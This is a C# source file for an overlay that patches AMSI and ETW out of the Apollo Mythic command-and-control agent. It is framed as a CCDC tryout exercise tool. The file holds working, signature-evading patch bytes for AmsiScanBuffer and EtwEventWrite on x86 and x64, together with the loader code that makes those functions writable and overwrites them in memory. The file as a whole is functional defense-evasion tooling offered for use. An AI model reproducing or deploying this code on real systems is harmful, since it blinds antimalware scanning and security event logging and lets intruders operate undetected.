// RuntimePatch.cs -- Apollo agent in-process AMSI/ETW suppression overlay (R5, Mode A).
//
// Authorized CCDC-tryout exercise use only.  Installed by `obfuscate inject-patch`
// into an Apollo `agent_code` checkout and compiled by the team's existing Mythic
// `dotnet build`.  No new package dependencies; only the Windows loader APIs below.
//
// Wired by inject-patch as the FIRST managed statement of Apollo's `Program.Main`
// (before any Apollo/Mythic in-process scripting machinery starts).  Because the
// entry assembly itself is scanned at load time before `Main` runs, this patch
// protects subsequent in-process scripting (Apollo `powershell`, `inline_assembly`)
// against AMSI-on-.NET only where the target image carries .NET Framework 4.8; it
// does NOT cover the entry image's own load-time/file scan (that is R4
// `rebuild_config` territory) nor sacrificial child processes (`powerpick`,
// `execute_assembly`, fork-and-run `powershell.exe`), which are separate
// processes that do not inherit the patch.
//
// Patch contract (mirrors obfuscate/patch.py):
//   * AMSI: patched `AmsiScanBuffer` leaves EAX == E_INVALIDARG (0x80070057) and
//     performs NO memory writes, so the `AMSI_RESULT` out-parameter is provably
//     untouched.  In-scope AMSI clients (PowerShell 5.1 SMA; the .NET 4.8 managed
//     load path) treat that failure HRESULT as an aborted, non-significant scan,
//     i.e. the effective "clean" outcome.
//   * ETW:  patched `EtwEventWrite` (ntdll export) leaves EAX == 0 (STATUS_SUCCESS),
//     a no-op return.  No memory writes.
//
// Patch-byte hygiene (R5/R6a): the byte tables below are seed-derived functional
// variants generated by `obfuscate/patch.py variant(seed, arch, target)` (seed 42,
// tables unchanged across builds; the native mode-B host re-derives per-seed
// variants at build time).  They are equivalent in effect to the canonical public
// sequences but never contain them verbatim, so the signatured constants do not
// ship in this source.  `tests/test_sources.py` re-checks this invariant across
// every runtime source and re-validates each table against patch.py's pure-Python
// instruction semantics (`simulate()`).
//
// Toggling: inject-patch parses the marker comments on the `const bool`
// lines below and flips the corresponding value.  `--patch amsi` / `--patch etw`
// select per-target toggles; the build-time GATE const disables the whole patch
// (equivalent to a no-op `ApplyPatches()`).

using System;
using System.Runtime.InteropServices;

namespace CcdcHardening
{
    /// <summary>
    /// In-process AMSI/ETW suppression for the Apollo agent.  Idempotent:
    /// applying twice is a no-op (a guard prevents re-patching) and every target
    /// function reflects whether its patch was actually written.
    /// </summary>
    public static class RuntimePatch
    {
        // Build-time gate: inject-patch leaves this true; flip to false to
        // disable the entire runtime patch at build time.
        private const bool RUNTIME_PATCH_ENABLED = true; // GATE:runtime_patch

        // Per-target enable toggles: inject-patch sets these from the repeated
        // `--patch` flag (default: both on).
        private const bool ENABLE_AMSI = true; // TOGGLE:amsi
        private const bool ENABLE_ETW = true; // TOGGLE:etw

        // Seed-derived functional variants (variant(42, arch, target)) from
        // obfuscate/patch.py.  AMSI tables leave EAX == 0x80070057 and never
        // write memory (the AMSI_RESULT out-param stays untouched); ETW tables
        // leave EAX == 0.  None contains a canonical public sequence verbatim.
        private static readonly byte[] AMSI_PATCH_X86 =
        {
            0xEB, 0x08, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xB9, 0x57, 0x00, 0x07, 0x80, 0x33, 0xC0, 0x8B, 0xC1, 0x8D, 0x76, 0x00, 0x90, 0x8D, 0x49, 0x00, 0x8D, 0x76, 0x00, 0x90, 0x8D, 0x76, 0x00, 0x90, 0x8D, 0x76, 0x00, 0x8D, 0x4A, 0x00, 0x66, 0x90, 0x89, 0xF6, 0x89, 0xF6, 0xC3
        };

        private static readonly byte[] AMSI_PATCH_X64 =
        {
            0xEB, 0x0C, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xBE, 0x57, 0x00, 0x07, 0x80, 0x8B, 0xC6, 0x0F, 0x1F, 0x40, 0x00, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x8D, 0x4A, 0x00, 0x89, 0xF6, 0x66, 0x90, 0x66, 0x90, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x8D, 0x4A, 0x00, 0x89, 0xF6, 0xEB, 0x00, 0x90, 0xC3
        };

        private static readonly byte[] ETW_PATCH_X86 =
        {
            0xEB, 0x1B, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x8B, 0xC2, 0x90, 0x8D, 0x49, 0x00, 0x66, 0x90, 0x8D, 0x76, 0x00, 0x8D, 0x49, 0x00, 0x66, 0x90, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0xC3
        };

        private static readonly byte[] ETW_PATCH_X64 =
        {
            0xEB, 0x15, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xB9, 0x00, 0x00, 0x00, 0x00, 0x8B, 0xC1, 0x8D, 0x76, 0x00, 0x90, 0x0F, 0x1F, 0x40, 0x00, 0x0F, 0x1F, 0x40, 0x00, 0x90, 0x8D, 0x76, 0x00, 0xEB, 0x00, 0x90, 0x8D, 0x76, 0x00, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x66, 0x90, 0x0F, 0x1F, 0x40, 0x00, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0xC3
        };

        // Loader API surface (R5): force-load via LoadLibraryA, resolve via
        // GetModuleHandleA/GetProcAddress, then make the target page writable
        // with VirtualProtect.  No new dependencies.
        [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
        private static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.LPStr)] string lpFileName);

        [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
        private static extern IntPtr GetModuleHandleA([MarshalAs(UnmanagedType.LPStr)] string lpModuleName);

        [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
        private static extern IntPtr GetProcAddress(IntPtr hModule, [MarshalAs(UnmanagedType.LPStr)] string lpProcName);

        [DllImport("kernel32.dll", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize,
            uint flNewProtect, out uint lpflOldProtect);

        private const uint PAGE_EXECUTE_READWRITE = 0x40;

        /// <summary>True when the AMSI function was patched on this run.</summary>
        public static bool AmsiPatched { get; private set; }

        /// <summary>True when the ETW function was patched on this run.</summary>
        public static bool EtwPatched { get; private set; }

        private static bool _applied;

        /// <summary>
        /// Apply the enabled, arch-matched patch targets in-process on this
        /// process's managed image.  Idempotent: after the first successful (or
        /// attempted) application a guard short-circuits, and each target is
        /// skipped when its bytes already match the intended patch.  Enabled
        /// targets and arch selection come from the constants above.
        /// </summary>
        public static void ApplyPatches()
        {
            if (!RUNTIME_PATCH_ENABLED || _applied)
            {
                return;
            }
            _applied = true;

            bool isX64 = IntPtr.Size == 8;
            if (ENABLE_AMSI)
            {
                AmsiPatched = ApplyTarget(
                    "amsi.dll",
                    "AmsiScanBuffer",
                    isX64 ? AMSI_PATCH_X64 : AMSI_PATCH_X86);
            }
            if (ENABLE_ETW)
            {
                EtwPatched = ApplyTarget(
                    "ntdll.dll",
                    "EtwEventWrite",
                    isX64 ? ETW_PATCH_X64 : ETW_PATCH_X86);
            }
        }

        private static bool ApplyTarget(string dllName, string exportName, byte[] patch)
        {
            // Force-load first so the export is reliably present, then resolve.
            IntPtr module = LoadLibraryA(dllName);
            if (module == IntPtr.Zero)
            {
                module = GetModuleHandleA(dllName);
            }
            if (module == IntPtr.Zero)
            {
                return false;
            }
            IntPtr function = GetProcAddress(module, exportName);
            if (function == IntPtr.Zero)
            {
                return false;
            }

            // Idempotency: never re-patch a function that already carries our
            // intended bytes (also safe across duplicate wiring in Main).
            if (BytesMatch(function, patch))
            {
                return true;
            }

            uint oldProtect;
            if (!VirtualProtect(function, (UIntPtr)patch.Length, PAGE_EXECUTE_READWRITE,
                    out oldProtect))
            {
                return false;
            }
            Marshal.Copy(patch, 0, function, patch.Length);
            // Restore the previous page protection; the write is already in cache.
            VirtualProtect(function, (UIntPtr)patch.Length, oldProtect, out oldProtect);
            return true;
        }

        private static bool BytesMatch(IntPtr address, byte[] patch)
        {
            if (patch.Length == 0)
            {
                return false;
            }
            byte[] current = new byte[patch.Length];
            try
            {
                Marshal.Copy(address, current, 0, patch.Length);
            }
            catch (Exception)
            {
                return false;
            }
            for (int i = 0; i < patch.Length; i++)
            {
                if (current[i] != patch[i])
                {
                    return false;
                }
            }
            return true;
        }
    }
}